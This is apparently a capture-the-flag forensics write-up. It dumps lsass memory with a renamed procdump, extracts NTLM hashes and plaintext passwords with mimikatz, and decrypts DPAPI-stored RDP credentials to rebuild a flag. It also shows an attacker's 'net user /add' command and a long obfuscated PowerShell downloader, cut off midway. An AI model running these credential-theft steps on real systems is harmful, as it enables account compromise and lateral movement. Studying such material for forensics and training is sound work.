Execute C:\Windows\System32\UpdateAgent.exe -accepteula -ma lsass.exe C:\Windows\System32\errordump lsass.exe and save the data in C:\Windows\System32\error.dmp

Execute C:\Windows\System32\mimikatz.exe

Since the description mentioned that there are two parts of the flag for this topic, we need to obtain the first part of the flag according to the idea

The first part flag2:

First extract C:\Windows\System32\error.dmp

Download a mimikatz https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20220919/mimikatz_trunk.7z

Admin runs cmd which then runs mimikatz

ps: For convenience, I renamed error.dmp to lsass.dmp and put it in the same directory as mimikatz

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
mimikatz # privilege::debug
Privilege '20' OK

mimikatz # sekurlsa::minidump lsass.dmp
Switch to MINIDUMP : 'lsass.dmp'

mimikatz # sekurlsa::logonPasswords full
Opening : 'lsass.dmp' file for minidump...

Authentication Id : 0 ; 284687 (00000000:0004580f)
Session : Interactive from 1
User Name : IEUser
Domain : IEWIN7
Logon Server : IEWIN7
Logon Time : 2023/1/8 2:47:38
SID : S-1-5-21-1610009768-122519599-941061767-1000
msv :
[00010000] CredentialKeys
* NTLM : 022156166aa2ab0ce4de16a45098d745
* SHA1 : ece4d499be6e18ebf42225da680e702abf639db3
[00000003] Primary
* Username : IEUser
* Domain : IEWIN7
* NTLM : 022156166aa2ab0ce4de16a45098d745
* SHA1 : ece4d499be6e18ebf42225da680e702abf639db3
tspkg :
wdigest :
* Username : IEUser
* Domain : IEWIN7
* Password : idek{crEDentia
kerberos :
* Username : IEUser
* Domain : IEWIN7
* Password : (null)
ssp :
credman :

Authentication Id : 0 ; 95278 (00000000:0001742e)
Session : Service from 0
User Name : sshd_server
Domain : IEWIN7
Logon Server : IEWIN7
Logon Time : 2023/1/8 2:46:44
SID : S-1-5-21-1610009768-122519599-941061767-1002
msv :
[00010000] CredentialKeys
* NTLM : 8d0a16cfc061c3359db455d00ec27035
* SHA1 : 94bd2df8ae5cadbbb5757c3be01dd40c27f9362f
[00000003] Primary
* Username : sshd_server
* Domain : IEWIN7
* NTLM : 8d0a16cfc061c3359db455d00ec27035
* SHA1 : 94bd2df8ae5cadbbb5757c3be01dd40c27f9362f
tspkg :
wdigest :
* Username : sshd_server
* Domain : IEWIN7
* Password : D@rj33l1ng
kerberos :
* Username : sshd_server
* Domain : IEWIN7
* Password : (null)
ssp :
credman :

Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2023/1/8 2:46:43
SID : S-1-5-19
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman :

Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : IEWIN7$
Domain : WORKGROUP
Logon Server : (null)
Logon Time : 2023/1/8 2:46:43
SID : S-1-5-20
msv :
tspkg :
wdigest :
* Username : IEWIN7$
* Domain : WORKGROUP
* Password : (null)
kerberos :
* Username : iewin7$
* Domain : WORKGROUP
* Password : (null)
ssp :
credman :

Authentication Id : 0 ; 44073 (00000000:0000ac29)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 2023/1/8 2:46:43
SID :
msv :
tspkg :
wdigest :
kerberos :
ssp :
credman :

Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : IEWIN7$
Domain : WORKGROUP
Logon Server : (null)
Logon Time : 2023/1/8 2:46:43
SID : S-1-5-18
msv :
tspkg :
wdigest :
* Username : IEWIN7$
* Domain : WORKGROUP
* Password : (null)
kerberos :
* Username : iewin7$
* Domain : WORKGROUP
* Password : (null)
ssp :
credman :

In this way, we can get the first part of the flag2 –> IDEK{credentia

The second part flag2:

Tips: I personally think that this part is somewhat misleading. When I communicate with admin on the ticket, admin means that the released traffic is not a necessary condition to solve this problem (although it is also written in Note.txt, but I seem to forget ), but it can help to understand. Personally, I think it is somewhat misleading. However, in my mind-set, this part gave a password, which may be used, so I was stuck on this part for a while. After all, I wondered if there might be some traffic authentication, but I found that it was not. Then I found this The article is about the decryption of credential certificate https://www.cnblogs.com/Thorndike/p/15325079.html, I personally suggest that it can be optimized here to ensure that it can be natural

Find DB79FF0C49C20D542F3690C933AC3046 under C:\Users\IEUser\AppData\Local\Microsoft\Credentials and extract it

Get the GUID of Credentials

1
2
3
4
5
6
7
8
9
mimikatz # dpapi::cred /in:DB79FF0C49C20D542F3690C933AC3046
**BLOB**
dwVersion : 00000001 - 1
guidProvider : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}
dwMasterKeyVersion : 00000001 - 1
guidMasterKey : {9fd81d55-a794-4a77-9fdc-38eff814d2be}
dwFlags : 20000000 - 536870912 (system ; )
dwDescriptionLen : 00000030 - 48
szDescription : Local Credential Data

guidMasterKey –> {9fd81d55-a794-4a77-9fdc-38eff814d2be}

Import dmp:

1
2
mimikatz # sekurlsa::minidump lsass.dmp
Switch to MINIDUMP : 'lsass.dmp'

Get masterkey:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
mimikatz # privilege::debug
Privilege '20' OK

mimikatz # sekurlsa::dpapi

Authentication Id : 0 ; 284687 (00000000:0004580f)
Session : Interactive from 1
User Name : IEUser
Domain : IEWIN7
Logon Server : IEWIN7
Logon Time : 2023/1/8 2:47:38
SID : S-1-5-21-1610009768-122519599-941061767-1000
[00000000]
* GUID : {9fd81d55-a794-4a77-9fdc-38eff814d2be}
* Time : 2023/1/8 2:47:40
* MasterKey : e7b41c6fc2aa1edc0dc74dee160f024ff4fa026c307794c4f7739771ff60975fc7c311ab3d5346e998d61c1906a8a7b59c7c21d16910e23f4afa3959982ccccb
* sha1(key) : de78dc1fb05d27eddaa81f4c2143d43a9a316f1e


Authentication Id : 0 ; 95278 (00000000:0001742e)
Session : Service from 0
User Name : sshd_server
Domain : IEWIN7
Logon Server : IEWIN7
Logon Time : 2023/1/8 2:46:44
SID : S-1-5-21-1610009768-122519599-941061767-1002


Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2023/1/8 2:46:43
SID : S-1-5-19


Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : IEWIN7$
Domain : WORKGROUP
Logon Server : (null)
Logon Time : 2023/1/8 2:46:43
SID : S-1-5-20


Authentication Id : 0 ; 44073 (00000000:0000ac29)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 2023/1/8 2:46:43
SID :


Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : IEWIN7$
Domain : WORKGROUP
Logon Server : (null)
Logon Time : 2023/1/8 2:46:43
SID : S-1-5-18
[00000000]
* GUID : {79cd7db5-e519-453b-9dc9-ad52372a33d1}
* Time : 2023/1/8 2:46:56
* MasterKey : 50f4acc588c6f7aab0902c5e638c46b3671b150abf8d55e5a5ae47c50062607e3ec383b1973bae8d9d53815e59bfe012c594a232f2788562e461c9620ae74c31
* sha1(key) : 913dba47ec0e0122494b963271da1c8a5757ef6c
[00000001]
* GUID : {f22e410f-f947-4e08-8f2a-8f65df603f8d}
* Time : 2023/1/8 2:46:43
* MasterKey : 19c05880b67d50f8231cd8009836e3cdc55610e4877f8b976abd5ca15600d0e759934324c6204b56f02527039e7fc52a1dfb5296d3381aaa7c3eb610dffa32fa
* sha1(key) : b859b2b52e7e49cf5c70069745c88853c4b23487

MasterKey –> e7b41c6fc2aa1edc0dc74dee160f024ff4fa026c307794c4f7739771ff60975fc7c311ab3d5346e998d61c1906a8a7b59c7c21d16910e23f4afa3959982ccccb

decrypt:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
mimikatz # dpapi::cred /in:DB79FF0C49C20D542F3690C933AC3046 /masterkey:e7b41c6fc2aa1edc0dc74dee160f024ff4fa026c307794c4f7739771ff60975fc7c311ab3d5346e998d61c1906a8a7b59c7c21d16910e23f4afa3959982ccccb
**BLOB**
dwVersion : 00000001 - 1
guidProvider : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}
dwMasterKeyVersion : 00000001 - 1
guidMasterKey : {9fd81d55-a794-4a77-9fdc-38eff814d2be}
dwFlags : 20000000 - 536870912 (system ; )
dwDescriptionLen : 00000030 - 48
szDescription : Local Credential Data

algCrypt : 00006610 - 26128 (CALG_AES_256)
dwAlgCryptLen : 00000100 - 256
dwSaltLen : 00000020 - 32
pbSalt : d1ae596e635002339b7dcce09f5ff6acc53b7bc9395d162ea93c328f98c31f53
dwHmacKeyLen : 00000000 - 0
pbHmackKey :
algHash : 0000800e - 32782 (CALG_SHA_512)
dwAlgHashLen : 00000200 - 512
dwHmac2KeyLen : 00000020 - 32
pbHmack2Key : 92e17a569f3c13606b0893c758fb9e81c1a06d2015dcebcf15107900a963ad0e
dwDataLen : 000000f0 - 240
pbData : 1413918e9f648cfb258ed6bd270360ab66d1d5e9c16580866a899184a71feb58219ade909f09184d6796ef0bd91e5091be80e76f48aa4cf7f29bfda7bb63d74e62698283cf2b6faf8ad44ddc296341acd8e61fe8cd12f2e33e8ae6bd20b328772b0816b881f21f877d8a1506fcbb06ce2b85688244b05911e97fa3f9068af0d17de3f6813cc937be00830986e93e2a467de46f11260746fe42ea38f6a20d79f1696de59efe69ead3bcb97a7ce85d45a6c78ec77bfe42b1a891175a519d37286ab3cf8a58955fdc5561f7543e6754953cce0576f58819433a47c930a31c9ad4dccf7376b1be3b00b7111ba649876b20d1
dwSignLen : 00000040 - 64
pbSign : 7f41a9469ad24a5e572c48ab6f0f1919f0a53e52963ad88676fb730aa9d6ba7e4045e5b3e45c9a33b56ca720c82d202cabd8085cabc5f3834e537ff79a987f22

Decrypting Credential:
* volatile cache: GUID:{9fd81d55-a794-4a77-9fdc-38eff814d2be};KeyHash:de78dc1fb05d27eddaa81f4c2143d43a9a316f1e;Key:available
* masterkey : e7b41c6fc2aa1edc0dc74dee160f024ff4fa026c307794c4f7739771ff60975fc7c311ab3d5346e998d61c1906a8a7b59c7c21d16910e23f4afa3959982ccccb
**CREDENTIAL**
credFlags : 00000030 - 48
credSize : 000000ea - 234
credUnk0 : 00000000 - 0

Type : 00000002 - 2 - domain_password
Flags : 00000000 - 0
LastWritten : 2023/1/6 15:55:10
unkFlagsOrSize : 00000040 - 64
Persist : 00000002 - 2 - local_machine
AttributeCount : 00000000 - 0
unk0 : 00000000 - 0
unk1 : 00000000 - 0
TargetName : Domain:target=TERMSRV/192.168.209.134
UnkData : (null)
Comment : (null)
TargetAlias : (null)
UserName : administrator
CredentialBlob : l_4C3S5_f0R_1@73rAl_mOv3M3n7}
Attributes : 0

Get the second part of the second flag –> l_4C3S5_f0R_1@73rAl_mOv3M3n7}

Splice the two to get flag2 –> idek{crEDential_4C3S5_f0R_1@73rAl_mOv3M3n7}

HiddenGem Mixtape 3: The Ultimate Goal

Add user:

Run net user netadmin S3cr3tpa5sw0rD /add

However, this does not seem to be used later as a related operation, but this part is more like an RDP prompt. Of course, you can also find RDP through the traffic part

RDP:

In the traffic packet, we can know that when the attacker steals relevant credentials through mimikatz, he logs in to 192.168.209.147 through rdp and then logs in to 192.168.209.134 from 192.168.209.147. The relevant traffic is as follows:

There are also some relevant information in the Security.evtx log

BMC:

Since the existence of RDP is known, at the same time, it can be associated with the RDP cache bitmap. After extracting these files, C:\Users\IEUser\AppData\Local\Microsoft\Terminal Server Client\Cache\ can use bmc-tools to get the relevant data https://github.com/ANSSI-FR/bmc-tools

Then do the jigsaw puzzle to get

It is not difficult to speculate that it uses the BitsTranser module to download the dns-stealing file and load it

https://learn.microsoft.com/en-us/powershell/module/bitstransfer/start-bitstransfer?view=windowsserver2022-ps

1
2
3
python3 bmc-tools.py -s Cache0000.bin -d ./00/
python3 bmc-tools.py -s Cache0001.bin -d ./01/
python3 bmc-tools.py -s Cache0002.bin -d ./02/

Next step to analyze the obfuscated powershell script

Powershell 2nd:

https://gist.github.com/bquanman/cb6a4b2420d9f3d2f27287dcb46661d6

After decrypting once, we get

1
(  ')(@'|  &('%'){  ${;@!}=  +  $()}  {  ${;+}  =${;@!}}{  ${~=}  =  ++${;@!}  }  {${@[}=(  ${;@!}  =${;@!}  +  ${~=})}  {${~}=  (  ${;@!}=${;@!}+  ${~=}  )  }{${![/}  =  (  ${;@!}=${;@!}  +${~=})  }  {  ${$] }=  (${;@!}  =${;@!}+${~=}  )  }  {  ${]}  =(${;@!}  =  ${;@!}  +  ${~=})  }{  ${](}=  (  ${;@!}=${;@!}+${~=}  )}  {  ${'$[}=  (  ${;@!}=${;@!}+${~=}  )}{${@$/}=(  ${;@!}=  ${;@!}+${~=})  }  {  ${)}  ="["  +  "$(@{}  )"[  ${](}  ]  +  "$(@{  })"[  "${~=}${@$/}"  ]+"$(  @{})"[  "${@[}${;+}"]  +  "$?"[  ${~=}]  +"]"}{  ${;@!}="".("$(  @{  })"["${~=}${![/}"]  +  "$(  @{})"[  "${~=}${]}"  ]  +  "$(@{  })  "[  ${;+}  ]  +  "$(  @{}  )  "[${![/}]  +"$?"[${~=}  ]  +"$(@{  })"[${~}  ])  }{${;@!}=  "$(  @{})  "[  "${~=}${![/}"  ]+"$(@{})  "[${![/}  ]+"${;@!}"[  "${@[}${](}"  ]  }  )  ;"${)}${~}${]}+${)}${~=}${;+}${;+}+${)}${]}${~=}  +${)}${~}${![/}  +${)}${![/}${@$/}  +${)}${$] }${$] }+  ${)}${$] }${;+}  +${)}${![/}${]}+${)}${$] }${;+}+  ${)}${![/}${@$/}  +${)}${![/}${]}+${)}${$] }${;+}  +  ${)}${![/}${'$[}+${)}${![/}${]}+${)}${$] }${](}+${)}${$] }${![/}  +${)}${~}${![/}  +${)}${$] }${@$/}  +${)}${~}${@[}+  ${)}${~}${]}+${)}${~=}${~=}${$] }  +  ${)}${]}${~=}+  ${)}${$] }${@[}  +  ${)}${$] }${@$/}+  ${)}${~}${@[}  +  ${)}${~}${]}+${)}${@$/}${'$[}  +${)}${]}${~=}+  ${)}${$] }${~}  +  ${)}${$] }${$] }  +  ${)}${$] }${@$/}  +${)}${~}${@[}  +${)}${](}${~=}+  ${)}${~=}${;+}${~=}+  ${)}${~=}${~=}${]}  +${)}${![/}${$] }  +${)}${]}${](}+  ${)}${~=}${;+}${![/}+${)}${~=}${;+}${$] }+  ${)}${~=}${;+}${'$[}  +${)}${~=}${;+}${;+}  +${)}${](}${~}  +  ${)}${~=}${~=}${]}+${)}${~=}${;+}${~=}+${)}${~=}${;+}${@$/}+  ${)}${~}${@[}  +  ${)}${~}${![/}  +${)}${![/}${]}  +${)}${~}${![/}+  ${)}${~}${@[}+  ${)}${~=}${@[}${![/}+  ${)}${~}${@[}  +${)}${](}${;+}+  ${)}${~=}${~=}${~=}+${)}${~=}${~=}${![/}+${)}${~=}${;+}${~=}  +${)}${@$/}${](}+${)}${@$/}${@$/}+${)}${~=}${;+}${![/}+${)}${![/}${$] }+  ${)}${](}${@$/}+${)}${@$/}${'$[}  +${)}${~=}${;+}${]}+  ${)}${~=}${;+}${~=}  +${)}${@$/}${@$/}  +  ${)}${~=}${~=}${]}+  ${)}${~}${@[}  +${)}${~=}${@[}${~}  +  ${)}${~}${]}  +  ${)}${@$/}${](}+${)}${]}${~=}+  ${)}${@$/}${~=}  +  ${)}${'$[}${~}  +  ${)}${~=}${@[}${~=}+${)}${~=}${~=}${$] }  +  ${)}${~=}${~=}${]}+${)}${~=}${;+}${~=}+  ${)}${~=}${;+}${@$/}  +  ${)}${![/}${]}+${)}${]}${](}+  ${)}${~=}${~=}${~=}+  ${)}${~=}${~=}${;+}+  ${)}${~=}${~=}${'$[}+  ${)}${~=}${;+}${~=}+  ${)}${~=}${~=}${![/}+${)}${~=}${~=}${]}  +${)}${@$/}${~}  +${)}${$] }${'$[}+  ${)}${$] }${'$[}+  ${)}${'$[}${![/}+${)}${~=}${~=}${~=}+  ${)}${]}${]}+${)}${@$/}${](}  +${)}${~=}${~=}${$] }+  ${)}${~=}${;+}${~=}+${)}${$] }${![/}  +  ${)}${$] }${@[}+${)}${'$[}${~}  +${)}${~=}${~=}${]}  +  ${)}${~=}${~=}${![/}+  ${)}${~=}${;+}${$] }+${)}${~=}${~=}${;+}+  ${)}${~=}${;+}${~}+  ${)}${![/}${;+}+  ${)}${~}${]}+${)}${]}${@$/}  +${)}${~=}${~=}${;+}+  ${)}${@$/}${@$/}  +  ${)}${![/}${]}+${)}${](}${~=}  +${)}${~=}${;+}${~=}  +  ${)}${~=}${~=}${]}  +  ${)}${]}${]}+  ${)}${~=}${@[}${~=}+${)}${~=}${~=}${]}+${)}${~=}${;+}${~=}  +${)}${~=}${~=}${$] }+${)}${![/}${;+}  +${)}${~}${]}  +  ${)}${@$/}${$] }  +  ${)}${![/}${]}+  ${)}${](}${'$[}+  ${)}${@$/}${](}  +${)}${~=}${;+}${@$/}  +${)}${~=}${;+}${~=}+${)}${![/}${~=}+  ${)}${![/}${~=}  +${)}${$] }${@$/}+  ${)}${~}${@[}  +${)}${~}${]}+${)}${'$[}${@[}+${)}${]}${~=}  +  ${)}${~=}${@[}${~}+${)}${~}${]}  +${)}${]}${'$[}  +  ${)}${![/}${![/}  +${)}${~}${]}  +  ${)}${](}${$] }  +${)}${]}${~=}  +${)}${~}${]}+${)}${]}${$] }+${)}${~=}${~=}${![/}  +  ${)}${~=}${;+}${~}  +${)}${~=}${~=}${$] }+${)}${$] }${@$/}  +${)}${~}${]}+  ${)}${'$[}${~}+${)}${]}${~=}+  ${)}${![/}${'$[}+${)}${![/}${]}+  ${)}${![/}${]}  +  ${)}${$] }${;+}  +  ${)}${$] }${~}  +${)}${$] }${~}  +${)}${$] }${@$/}  +  ${)}${![/}${'$[}  +${)}${![/}${]}+${)}${![/}${]}  +  ${)}${$] }${;+}+  ${)}${$] }${~}+  ${)}${$] }${~}  +${)}${~=}${@[}${![/}  +${)}${~}${](}+${)}${~=}${@[}${~}  +${)}${~}${]}  +  ${)}${](}${![/}  +${)}${]}${~=}  +${)}${![/}${;+}+${)}${~}${]}+${)}${](}${![/}+${)}${![/}${~}  +  ${)}${~}${]}  +  ${)}${'$[}${~}+  ${)}${@$/}${~=}+  ${)}${~}${]}+${)}${@$/}${$] }+${)}${@$/}${~}+  ${)}${![/}${~}  +  ${)}${~}${]}  +  ${)}${](}${$] }  +${)}${@$/}${~=}  +${)}${~}${]}  +${)}${@$/}${$] }+  ${)}${~}${](}  +${)}${~}${]}  +  ${)}${](}${$] }  +  ${)}${![/}${]}+${)}${](}${]}  +${)}${~=}${;+}${~=}+${)}${~=}${~=}${;+}  +  ${)}${~=}${;+}${~}+  ${)}${~=}${~=}${]}  +${)}${~=}${;+}${![/}  +${)}${@$/}${~}+${)}${![/}${~=}+  ${)}${~}${](}+${)}${$] }${;+}+${)}${$] }${~}+${)}${$] }${![/}  +  ${)}${$] }${@$/}  +  ${)}${~}${]}+${)}${'$[}${~}+  ${)}${@$/}${~=}+  ${)}${~}${]}  +  ${)}${@$/}${$] }  +${)}${@$/}${~}  +  ${)}${![/}${![/}  +  ${)}${~}${]}  +${)}${'$[}${~}+${)}${@$/}${~=}  +${)}${~}${]}+  ${)}${](}${![/}+  ${)}${@$/}${~}  +${)}${]}${~=}+${)}${~}${]}+  ${)}${'$[}${~}+${)}${@$/}${~=}+${)}${~}${]}  +  ${)}${](}${![/}  +${)}${@$/}${~}+  ${)}${![/}${![/}  +  ${)}${~}${]}  +  ${)}${'$[}${~}  +${)}${@$/}${~=}  +${)}${~}${]}  +${)}${@$/}${$] }  +  ${)}${@$/}${~}  +${)}${~=}${@[}${$] }+${)}${$] }${@$/}  +  ${)}${~}${]}+  ${)}${]}${'$[}+  ${)}${~=}${@[}${![/}+${)}${~}${](}  +  ${)}${~=}${@[}${~}  +${)}${~}${]}  +${)}${](}${~}+${)}${]}${~=}  +${)}${![/}${;+}+  ${)}${~}${]}+  ${)}${](}${~}  +  ${)}${![/}${~}+  ${)}${![/}${@$/}+  ${)}${![/}${~=}  +  ${)}${~}${](}  +${)}${$] }${;+}  +${)}${$] }${~}+${)}${$] }${![/}+  ${)}${$] }${@$/}+  ${)}${~}${]}+  ${)}${](}${@[}  +${)}${]}${~=}+${)}${![/}${;+}+  ${)}${~}${]}  +${)}${](}${@[}+  ${)}${![/}${~}  +${)}${~}${]}+${)}${'$[}${~}+  ${)}${@$/}${~=}  +  ${)}${~}${]}+${)}${](}${~}+${)}${@$/}${~}+${)}${![/}${~=}  +  ${)}${~}${](}  +${)}${$] }${;+}+  ${)}${$] }${~}  +  ${)}${$] }${![/}  +${)}${$] }${@$/}+${)}${~}${]}  +${)}${'$[}${~}+${)}${@$/}${~=}+  ${)}${~}${]}  +${)}${](}${~}+${)}${@$/}${~}+${)}${![/}${![/}+  ${)}${~}${]}+  ${)}${'$[}${~}+  ${)}${@$/}${~=}+  ${)}${~}${]}+  ${)}${](}${@[}  +${)}${@$/}${~}  +  ${)}${]}${~=}  +${)}${~}${]}+${)}${'$[}${~}+  ${)}${@$/}${~=}  +  ${)}${~}${]}+${)}${](}${@[}+${)}${@$/}${~}+  ${)}${![/}${![/}  +  ${)}${~}${]}+  ${)}${'$[}${~}  +${)}${@$/}${~=}+  ${)}${~}${]}  +  ${)}${](}${~}+${)}${@$/}${~}  +  ${)}${$] }${@$/}  +  ${)}${~}${]}  +  ${)}${@$/}${$] }  +${)}${![/}${$] }+  ${)}${@$/}${'$[}+${)}${~=}${@[}${;+}+  ${)}${~=}${~=}${~=}  +  ${)}${~=}${~=}${![/}+  ${)}${~}${]}+  ${)}${'$[}${~}+${)}${@$/}${~=}+  ${)}${![/}${;+}+  ${)}${~}${]}+${)}${'$[}${~}+${)}${@$/}${~=}+  ${)}${~}${]}+  ${)}${](}${~}  +${)}${@$/}${~}  +${)}${![/}${~}  +  ${)}${~}${]}+  ${)}${'$[}${~}  +${)}${@$/}${~=}+${)}${~}${]}  +${)}${](}${@[}+${)}${@$/}${~}  +  ${)}${![/}${~=}+  ${)}${~}${](}  +  ${)}${$] }${;+}+  ${)}${$] }${~}  +  ${)}${$] }${![/}  +${)}${@$/}${~}+  ${)}${~=}${@[}${$] }+  ${)}${~=}${@[}${$] }+  ${)}${$] }${@$/}+  ${)}${~}${@[}  +${)}${~}${]}  +  ${)}${]}${@$/}  +${)}${~=}${~=}${;+}  +  ${)}${@$/}${@$/}+  ${)}${~}${@[}  +  ${)}${]}${~=}  +${)}${~}${@[}  +  ${)}${@$/}${~=}+${)}${'$[}${~}  +${)}${~=}${@[}${~=}  +  ${)}${~=}${~=}${$] }+  ${)}${~=}${~=}${]}  +  ${)}${~=}${;+}${~=}  +${)}${~=}${;+}${@$/}+  ${)}${![/}${]}+${)}${'$[}${![/}+${)}${~=}${;+}${~=}+${)}${~=}${@[}${;+}  +  ${)}${~=}${~=}${]}  +${)}${![/}${]}  +  ${)}${]}${@$/}  +  ${)}${~=}${~=}${;+}  +  ${)}${@$/}${@$/}+${)}${~=}${~=}${~=}  +${)}${~=}${;+}${;+}  +  ${)}${~=}${;+}${$] }+  ${)}${~=}${~=}${;+}  +${)}${~=}${;+}${~}+  ${)}${@$/}${~}+${)}${$] }${'$[}+${)}${$] }${'$[}+  ${)}${]}${$] }  +  ${)}${'$[}${~}+  ${)}${]}${](}+${)}${](}${~}+  ${)}${](}${~}  +  ${)}${$] }${@$/}  +${)}${~}${@[}+${)}${~}${]}  +${)}${~=}${~=}${@[}+${)}${~}${@[}+  ${)}${]}${~=}  +${)}${~}${@[}+  ${)}${~}${]}+  ${)}${]}${@$/}+  ${)}${~=}${~=}${;+}+  ${)}${@$/}${@$/}+  ${)}${![/}${]}  +${)}${](}${~=}  +${)}${~=}${;+}${~=}  +${)}${~=}${~=}${]}  +${)}${]}${]}+  ${)}${~=}${@[}${~=}+${)}${~=}${~=}${]}+${)}${~=}${;+}${~=}  +  ${)}${~=}${~=}${$] }+${)}${![/}${;+}  +${)}${~}${@$/}+${)}${@$/}${~=}+  ${)}${'$[}${~}  +  ${)}${~=}${@[}${~=}  +${)}${~=}${~=}${$] }  +  ${)}${~=}${~=}${]}  +  ${)}${~=}${;+}${~=}  +${)}${~=}${;+}${@$/}+  ${)}${![/}${]}  +  ${)}${](}${~}+${)}${](}${@$/}+  ${)}${![/}${]}+  ${)}${](}${;+}+${)}${~=}${;+}${$] }+  ${)}${~=}${;+}${'$[}+  ${)}${~=}${;+}${~=}  +${)}${@$/}${~}  +  ${)}${$] }${'$[}+  ${)}${$] }${'$[}+  ${)}${'$[}${@[}+  ${)}${~=}${;+}${~=}  +  ${)}${@$/}${](}  +${)}${~=}${;+}${;+}+  ${)}${]}${$] }+  ${)}${~=}${;+}${'$[}  +  ${)}${~=}${;+}${'$[}+${)}${]}${]}  +${)}${~=}${@[}${~=}+${)}${~=}${~=}${]}  +  ${)}${~=}${;+}${~=}  +  ${)}${~=}${~=}${$] }  +  ${)}${![/}${;+}  +  ${)}${~}${]}  +${)}${@$/}${$] }+${)}${![/}${]}  +${)}${](}${;+}+${)}${~=}${~=}${](}+${)}${~=}${;+}${'$[}+${)}${~=}${;+}${'$[}+${)}${](}${'$[}  +  ${)}${@$/}${](}  +  ${)}${~=}${;+}${@$/}  +  ${)}${~=}${;+}${~=}+  ${)}${![/}${~=}  +${)}${~}${@$/}  +  ${)}${![/}${~=}  +  ${)}${$] }${@$/}+${)}${~}${@[}  +  ${)}${~}${]}  +${)}${~=}${@[}${@[}  +${)}${~}${@[}+  ${)}${]}${~=}  +${)}${~}${@[}  +  ${)}${~}${]}+  ${)}${]}${@$/}+  ${)}${~=}${~=}${;+}+  ${)}${@$/}${@$/}  +${)}${![/}${]}  +${)}${](}${~=}  +${)}${~=}${;+}${~=}  +  ${)}${~=}${~=}${]}  +${)}${]}${]}  +  ${)}${~=}${@[}${~=}  +${)}${~=}${~=}${]}+  ${)}${~=}${;+}${~=}  +${)}${~=}${~=}${$] }  +${)}${![/}${;+}+${)}${@$/}${~=}+  ${)}${'$[}${~}  +  ${)}${~=}${@[}${~=}+  ${)}${~=}${~=}${$] }+  ${)}${~=}${~=}${]}  +${)}${~=}${;+}${~=}+${)}${~=}${;+}${@$/}+  ${)}${![/}${]}  +  ${)}${](}${~}+${)}${](}${@$/}+  ${)}${![/}${]}  +${)}${](}${;+}  +${)}${~=}${;+}${$] }  +  ${)}${~=}${;+}${'$[}+${)}${~=}${;+}${~=}  +  ${)}${@$/}${~}+  ${)}${$] }${'$[}+${)}${$] }${'$[}  +${)}${'$[}${@[}  +  ${)}${~=}${;+}${~=}  +${)}${@$/}${](}+  ${)}${~=}${;+}${;+}  +${)}${]}${$] }  +${)}${~=}${;+}${'$[}  +  ${)}${~=}${;+}${'$[}  +${)}${]}${]}+${)}${~=}${@[}${~=}+  ${)}${~=}${~=}${]}  +${)}${~=}${;+}${~=}  +${)}${~=}${~=}${$] }+  ${)}${![/}${;+}+${)}${~}${]}  +  ${)}${@$/}${$] }  +  ${)}${![/}${]}  +  ${)}${](}${;+}  +${)}${~=}${~=}${](}  +${)}${~=}${;+}${'$[}+  ${)}${~=}${;+}${'$[}  +  ${)}${](}${'$[}+${)}${@$/}${](}+${)}${~=}${;+}${@$/}  +  ${)}${~=}${;+}${~=}  +${)}${![/}${~=}+${)}${![/}${~=}  +  ${)}${$] }${@$/}  +${)}${~}${@[}  +${)}${~}${]}  +${)}${~=}${~=}${](}  +${)}${~}${@[}+${)}${]}${~=}  +${)}${~}${@[}  +  ${)}${![/}${;+}+  ${)}${~}${'$[}  +  ${)}${~}${@[}+${)}${~}${]}+${)}${'$[}${@[}+${)}${~}${@[}  +${)}${~}${]}  +${)}${~=}${@[}${@[}  +${)}${~}${@[}+  ${)}${~}${]}+${)}${~=}${~=}${@[}  +  ${)}${![/}${~=}+  ${)}${$] }${@$/}+${)}${~}${@[}+  ${)}${~}${]}+${)}${~=}${;+}${~=}  +  ${)}${~}${@[}  +${)}${]}${~=}+${)}${~}${@[}+${)}${@$/}${~=}+  ${)}${'$[}${~}  +${)}${~=}${@[}${~=}  +  ${)}${~=}${~=}${$] }+${)}${~=}${~=}${]}+  ${)}${~=}${;+}${~=}+${)}${~=}${;+}${@$/}  +${)}${![/}${]}  +${)}${]}${](}  +${)}${~=}${~=}${~=}  +${)}${~=}${~=}${;+}+${)}${~=}${~=}${'$[}  +  ${)}${~=}${;+}${~=}+${)}${~=}${~=}${![/}  +  ${)}${~=}${~=}${]}  +  ${)}${@$/}${~}+${)}${$] }${'$[}  +${)}${$] }${'$[}+  ${)}${'$[}${![/}  +  ${)}${~=}${~=}${~=}+  ${)}${]}${]}+${)}${@$/}${](}  +  ${)}${~=}${~=}${$] }  +${)}${~=}${;+}${~=}  +${)}${$] }${![/}+${)}${$] 